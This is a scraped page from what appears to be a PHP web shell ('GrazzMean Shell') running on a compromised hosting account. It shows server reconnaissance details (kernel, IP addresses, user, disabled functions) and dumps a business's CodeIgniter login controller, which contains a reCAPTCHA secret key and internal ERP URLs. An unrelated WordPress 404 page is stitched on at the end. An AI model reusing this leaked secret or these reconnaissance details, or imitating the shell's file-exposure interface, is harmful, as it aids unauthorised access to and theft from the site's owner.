shell bypass 403

GrazzMean Shell

Uname: Linux webm016.cluster127.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Software: Apache
PHP version: 7.4.33 [ PHP INFO ] PHP os: Linux
Server Ip: 54.36.31.145
Your Ip: 216.73.216.182
User: homesquasz (91404) | Group: users (100)
Safe Mode: OFF
Disable Function:
_dyuweyrj4,_dyuweyrj4r,dl

name : Login.php
<?php
/* 
 * Generated by CRUDigniter v3.2 
 * www.crudigniter.com
 */
 
class Login extends CI_Controller{
    function __construct()
    {
        parent::__construct();
        $this->load->model('User_model');
        
        
    } 

    /*
     * Listing of acces
     */
    function index()
    {
        $this->load->view("login");
        if($this->session->userdata("auth") != false){

            redirect("Dashboard/index");
        }
    }
    function connect(){
// if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['recaptcha_response'])) {

    // Build POST request:
    // $recaptcha_url = 'https://www.google.com/recaptcha/api/siteverify';
    // $recaptcha_secret = '6Ld1G5sUAAAAAM7IcmYS_8LTRI0XFLY4NRGKU_ud';
    // $recaptcha_response = $_POST['recaptcha_response'];

    // Make and decode POST request:
    // $recaptcha = file_get_contents($recaptcha_url . '?secret=' . $recaptcha_secret . '&response=' . $recaptcha_response);
    // $recaptcha = json_decode($recaptcha);

    // Take action based on the score returned:
    // if (isset($recaptcha->score) && $recaptcha->score >= 0.5) {
        $this->load->model('Contrat_model');
       $user = $this->User_model->connect($this->input->post("login"),$this->input->post("password"));
        if(isset($user[0])){
            //$url = 'http://DB-GHX.Groupe-Hammami.com:7048/GP_HAMMAMI/ODataV4/Company(\'005-SCPC\')/P_SoldeCongeEmployeeW?$format=json';
           // $this->Contrat_model->update_solde($url);
           // $url = 'http://db-ghx.groupe-hammami.com:7048/GP_HAMMAMI/ODataV4/Company(\'020-TMS\')/P_SoldeCongeEmployeeW?$format=json';
           // $this->Contrat_model->update_solde($url);
            $this->session->set_userdata("auth",$user[0]);
            redirect("dashboard/index");
        }else{
            redirect("login/index");
        }
    // } else {
        // redirect("login/index");
    // }

// }
        
    }
    function logout(){
        
        $this->session->unset_userdata(["auth"]);
        $this->session->sess_destroy();
        redirect("Login/index");
    }
}
© 2026 GrazzMean
Page non trouvée – APK Comptoir Hammami
Jannah Theme License is not validated, Go to the theme options page to validate the license, You need a single license for each domain name.

404 :(

Oups ! Cette page est introuvable.

Il semble que nous ne puissions pas trouver ce que vous cherchez. Peut-être qu'une recherche pourrait vous aider.

Bouton retour en haut de la page